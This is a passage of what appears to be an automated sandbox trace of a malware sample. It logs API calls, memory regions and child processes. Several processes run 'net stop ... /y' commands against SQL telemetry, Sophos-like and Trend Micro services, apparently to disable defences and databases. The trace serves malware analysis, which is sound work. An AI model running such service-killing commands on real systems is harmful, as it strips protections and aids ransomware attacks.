_wcsicmp (_String1="alerter", _String2="SQLTELEMETRY$ECWDB2") returned -18 [0115.353] _wcsicmp (_String1="netlogon", _String2="SQLTELEMETRY$ECWDB2") returned -5 [0115.353] NetServiceControl (in: servername=0x0, service="SQLTELEMETRY$ECWDB2", opcode=0x0, arg=0x0, bufptr=0xefab0 | out: bufptr=0xefab0) returned 0x889 [0115.354] wcscpy_s (in: _Destination=0xff0680d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0115.354] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0115.355] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff065b50, nSize=0x800, Arguments=0xff067f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0115.357] GetFileType (hFile=0xb) returned 0x2 [0115.357] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef978 | out: lpMode=0xef978) returned 1 [0115.358] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff065b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xef970, lpReserved=0x0 | out: lpBuffer=0xff065b50*, lpNumberOfCharsWritten=0xef970*=0x1e) returned 1 [0115.358] GetFileType (hFile=0xb) returned 0x2 [0115.358] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef978 | out: lpMode=0xef978) returned 1 [0115.358] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff041efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef970, lpReserved=0x0 | out: lpBuffer=0xff041efc*, lpNumberOfCharsWritten=0xef970*=0x2) returned 1 [0115.359] _ultow (in: _Dest=0x889, _Radix=981472 | out: _Dest=0x889) returned="2185" [0115.359] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff065b50, nSize=0x800, Arguments=0xff067f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0115.359] GetFileType (hFile=0xb) returned 0x2 [0115.359] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef978 | out: lpMode=0xef978) returned 1 [0115.359] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff065b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xef970, lpReserved=0x0 | out: lpBuffer=0xff065b50*, lpNumberOfCharsWritten=0xef970*=0x34) returned 1 [0115.360] GetFileType (hFile=0xb) returned 0x2 [0115.360] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef978 | out: lpMode=0xef978) returned 1 [0115.360] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff041efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef970, lpReserved=0x0 | out: lpBuffer=0xff041efc*, lpNumberOfCharsWritten=0xef970*=0x2) returned 1 [0115.361] NetApiBufferFree (Buffer=0x134d60) returned 0x0 [0115.361] NetApiBufferFree (Buffer=0x13c130) returned 0x0 [0115.361] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLTELEMETRY$ECWDB2 /y" [0115.361] exit (_Code=2) Process: id = "315" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x505cd000" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "297" os_parent_pid = "0x12a0" cmd_line = "C:\\Windows\\system32\\net1 stop SQLTELEMETRY /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11220 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11221 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11222 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11223 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 11224 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11225 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11226 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11227 start_va = 0xff040000 end_va = 0xff072fff entry_point = 0xff040000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11228 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11229 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11230 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 11231 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11258 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11259 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11260 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11261 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 11262 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 11263 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 11264 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11265 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11266 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11267 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11268 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11269 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11270 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11271 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11272 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11273 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11274 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11275 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11276 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11277 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11278 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11279 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11280 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11281 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11282 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11283 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11312 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 830 os_tid = 0xa84 [0115.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fbd0 | out: lpSystemTimeAsFileTime=0x12fbd0*(dwLowDateTime=0xf9d78e50, dwHighDateTime=0x1d48689)) [0115.259] GetCurrentProcessId () returned 0xb58 [0115.259] GetCurrentThreadId () returned 0xa84 [0115.259] GetTickCount () returned 0x267f5 [0115.259] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbd8 | out: lpPerformanceCount=0x12fbd8*=1816217700000) returned 1 [0115.260] GetModuleHandleW (lpModuleName=0x0) returned 0xff040000 [0115.260] __set_app_type (_Type=0x1) [0115.260] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff059c9c) returned 0x0 [0115.260] __getmainargs (in: _Argc=0xff064780, _Argv=0xff064790, _Env=0xff064788, _DoWildCard=0, _StartInfo=0xff06479c | out: _Argc=0xff064780, _Argv=0xff064790, _Env=0xff064788) returned 0 [0115.260] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.260] GetConsoleOutputCP () returned 0x1b5 [0115.366] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff06cec0 | out: lpCPInfo=0xff06cec0) returned 1 [0115.366] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0115.369] sprintf_s (in: _DstBuf=0x12fb78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0115.369] setlocale (category=0, locale=".437") returned="English_United States.437" [0115.371] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.371] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0115.371] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLTELEMETRY /y" [0115.371] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0115.371] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0115.371] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fb68 | out: Buffer=0x12fb68*=0x2c4d50) returned 0x0 [0115.371] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fb68 | out: Buffer=0x12fb68*=0x2cc100) returned 0x0 [0115.371] _fileno (_File=0x7fefdba2a80) returned 0 [0115.371] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0115.372] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0115.372] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0115.372] _wcsicmp (_String1="config", _String2="stop") returned -16 [0115.372] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0115.372] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0115.372] _wcsicmp (_String1="file", _String2="stop") returned -13 [0115.372] _wcsicmp (_String1="files", _String2="stop") returned -13 [0115.372] _wcsicmp (_String1="group", _String2="stop") returned -12 [0115.372] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0115.372] _wcsicmp (_String1="help", _String2="stop") returned -11 [0115.372] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0115.372] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0115.372] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0115.372] _wcsicmp (_String1="session", _String2="stop") returned -15 [0115.372] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0115.372] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0115.372] _wcsicmp (_String1="share", _String2="stop") returned -12 [0115.372] _wcsicmp (_String1="start", _String2="stop") returned -14 [0115.372] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0115.372] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0115.372] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0115.372] _wcsicmp (_String1="accounts", _String2="SQLTELEMETRY") returned -18 [0115.372] _wcsicmp (_String1="computer", _String2="SQLTELEMETRY") returned -16 [0115.372] _wcsicmp (_String1="config", _String2="SQLTELEMETRY") returned -16 [0115.372] _wcsicmp (_String1="continue", _String2="SQLTELEMETRY") returned -16 [0115.372] _wcsicmp (_String1="cont", _String2="SQLTELEMETRY") returned -16 [0115.372] _wcsicmp (_String1="file", _String2="SQLTELEMETRY") returned -13 [0115.372] _wcsicmp (_String1="files", _String2="SQLTELEMETRY") returned -13 [0115.372] _wcsicmp (_String1="group", _String2="SQLTELEMETRY") returned -12 [0115.372] _wcsicmp (_String1="groups", _String2="SQLTELEMETRY") returned -12 [0115.372] _wcsicmp (_String1="help", _String2="SQLTELEMETRY") returned -11 [0115.373] _wcsicmp (_String1="helpmsg", _String2="SQLTELEMETRY") returned -11 [0115.373] _wcsicmp (_String1="localgroup", _String2="SQLTELEMETRY") returned -7 [0115.373] _wcsicmp (_String1="pause", _String2="SQLTELEMETRY") returned -3 [0115.373] _wcsicmp (_String1="session", _String2="SQLTELEMETRY") returned -12 [0115.373] _wcsicmp (_String1="sessions", _String2="SQLTELEMETRY") returned -12 [0115.373] _wcsicmp (_String1="sess", _String2="SQLTELEMETRY") returned -12 [0115.373] _wcsicmp (_String1="share", _String2="SQLTELEMETRY") returned -9 [0115.373] _wcsicmp (_String1="start", _String2="SQLTELEMETRY") returned 3 [0115.373] _wcsicmp (_String1="stats", _String2="SQLTELEMETRY") returned 3 [0115.373] _wcsicmp (_String1="statistics", _String2="SQLTELEMETRY") returned 3 [0115.373] _wcsicmp (_String1="stop", _String2="SQLTELEMETRY") returned 3 [0115.373] _wcsicmp (_String1="time", _String2="SQLTELEMETRY") returned 1 [0115.373] _wcsicmp (_String1="user", _String2="SQLTELEMETRY") returned 2 [0115.373] _wcsicmp (_String1="users", _String2="SQLTELEMETRY") returned 2 [0115.373] _wcsicmp (_String1="msg", _String2="SQLTELEMETRY") returned -6 [0115.373] _wcsicmp (_String1="messenger", _String2="SQLTELEMETRY") returned -6 [0115.373] _wcsicmp (_String1="receiver", _String2="SQLTELEMETRY") returned -1 [0115.373] _wcsicmp (_String1="rcv", _String2="SQLTELEMETRY") returned -1 [0115.373] _wcsicmp (_String1="netpopup", _String2="SQLTELEMETRY") returned -5 [0115.373] _wcsicmp (_String1="redirector", _String2="SQLTELEMETRY") returned -1 [0115.373] _wcsicmp (_String1="redir", _String2="SQLTELEMETRY") returned -1 [0115.373] _wcsicmp (_String1="rdr", _String2="SQLTELEMETRY") returned -1 [0115.374] _wcsicmp (_String1="workstation", _String2="SQLTELEMETRY") returned 4 [0115.374] _wcsicmp (_String1="work", _String2="SQLTELEMETRY") returned 4 [0115.374] _wcsicmp (_String1="wksta", _String2="SQLTELEMETRY") returned 4 [0115.374] _wcsicmp (_String1="prdr", _String2="SQLTELEMETRY") returned -3 [0115.374] _wcsicmp (_String1="devrdr", _String2="SQLTELEMETRY") returned -15 [0115.374] _wcsicmp (_String1="lanmanworkstation", _String2="SQLTELEMETRY") returned -7 [0115.374] _wcsicmp (_String1="server", _String2="SQLTELEMETRY") returned -12 [0115.374] _wcsicmp (_String1="svr", _String2="SQLTELEMETRY") returned 5 [0115.374] _wcsicmp (_String1="srv", _String2="SQLTELEMETRY") returned 1 [0115.374] _wcsicmp (_String1="lanmanserver", _String2="SQLTELEMETRY") returned -7 [0115.374] _wcsicmp (_String1="alerter", _String2="SQLTELEMETRY") returned -18 [0115.374] _wcsicmp (_String1="netlogon", _String2="SQLTELEMETRY") returned -5 [0115.374] _wcsupr (in: _String="SQLTELEMETRY" | out: _String="SQLTELEMETRY") returned="SQLTELEMETRY" [0115.374] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2cce10 [0115.379] GetServiceKeyNameW (in: hSCManager=0x2cce10, lpDisplayName="SQLTELEMETRY", lpServiceName=0xff065750, lpcchBuffer=0x12fa88 | out: lpServiceName="", lpcchBuffer=0x12fa88) returned 0 [0115.380] _wcsicmp (_String1="msg", _String2="SQLTELEMETRY") returned -6 [0115.380] _wcsicmp (_String1="messenger", _String2="SQLTELEMETRY") returned -6 [0115.380] _wcsicmp (_String1="receiver", _String2="SQLTELEMETRY") returned -1 [0115.380] _wcsicmp (_String1="rcv", _String2="SQLTELEMETRY") returned -1 [0115.380] _wcsicmp (_String1="redirector", _String2="SQLTELEMETRY") returned -1 [0115.380] _wcsicmp (_String1="redir", _String2="SQLTELEMETRY") returned -1 [0115.380] _wcsicmp (_String1="rdr", _String2="SQLTELEMETRY") returned -1 [0115.380] _wcsicmp (_String1="workstation", _String2="SQLTELEMETRY") returned 4 [0115.380] _wcsicmp (_String1="work", _String2="SQLTELEMETRY") returned 4 [0115.380] _wcsicmp (_String1="wksta", _String2="SQLTELEMETRY") returned 4 [0115.380] _wcsicmp (_String1="prdr", _String2="SQLTELEMETRY") returned -3 [0115.380] _wcsicmp (_String1="devrdr", _String2="SQLTELEMETRY") returned -15 [0115.380] _wcsicmp (_String1="lanmanworkstation", _String2="SQLTELEMETRY") returned -7 [0115.380] _wcsicmp (_String1="server", _String2="SQLTELEMETRY") returned -12 [0115.380] _wcsicmp (_String1="svr", _String2="SQLTELEMETRY") returned 5 [0115.380] _wcsicmp (_String1="srv", _String2="SQLTELEMETRY") returned 1 [0115.381] _wcsicmp (_String1="lanmanserver", _String2="SQLTELEMETRY") returned -7 [0115.381] _wcsicmp (_String1="alerter", _String2="SQLTELEMETRY") returned -18 [0115.381] _wcsicmp (_String1="netlogon", _String2="SQLTELEMETRY") returned -5 [0115.381] NetServiceControl (in: servername=0x0, service="SQLTELEMETRY", opcode=0x0, arg=0x0, bufptr=0x12fa90 | out: bufptr=0x12fa90) returned 0x889 [0115.382] wcscpy_s (in: _Destination=0xff0680d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0115.382] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0115.383] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff065b50, nSize=0x800, Arguments=0xff067f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0115.385] GetFileType (hFile=0xb) returned 0x2 [0115.385] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f958 | out: lpMode=0x12f958) returned 1 [0115.386] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff065b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12f950, lpReserved=0x0 | out: lpBuffer=0xff065b50*, lpNumberOfCharsWritten=0x12f950*=0x1e) returned 1 [0115.386] GetFileType (hFile=0xb) returned 0x2 [0115.386] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f958 | out: lpMode=0x12f958) returned 1 [0115.387] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff041efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f950, lpReserved=0x0 | out: lpBuffer=0xff041efc*, lpNumberOfCharsWritten=0x12f950*=0x2) returned 1 [0115.387] _ultow (in: _Dest=0x889, _Radix=1243584 | out: _Dest=0x889) returned="2185" [0115.387] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff065b50, nSize=0x800, Arguments=0xff067f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0115.387] GetFileType (hFile=0xb) returned 0x2 [0115.387] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f958 | out: lpMode=0x12f958) returned 1 [0115.388] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff065b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12f950, lpReserved=0x0 | out: lpBuffer=0xff065b50*, lpNumberOfCharsWritten=0x12f950*=0x34) returned 1 [0115.388] GetFileType (hFile=0xb) returned 0x2 [0115.388] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f958 | out: lpMode=0x12f958) returned 1 [0115.389] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff041efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f950, lpReserved=0x0 | out: lpBuffer=0xff041efc*, lpNumberOfCharsWritten=0x12f950*=0x2) returned 1 [0115.389] NetApiBufferFree (Buffer=0x2c4d50) returned 0x0 [0115.389] NetApiBufferFree (Buffer=0x2cc100) returned 0x0 [0115.389] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLTELEMETRY /y" [0115.389] exit (_Code=2) Process: id = "316" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x20471000" os_pid = "0x1288" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop swi_update_64 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11313 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11314 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11315 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11316 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 11317 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11318 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11319 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11320 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11321 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11322 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11323 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 11324 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 831 os_tid = 0xa44 Process: id = "317" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x21191000" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop TmCCSF /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11325 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11326 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 11327 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 11328 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11329 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11330 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11331 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11332 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id 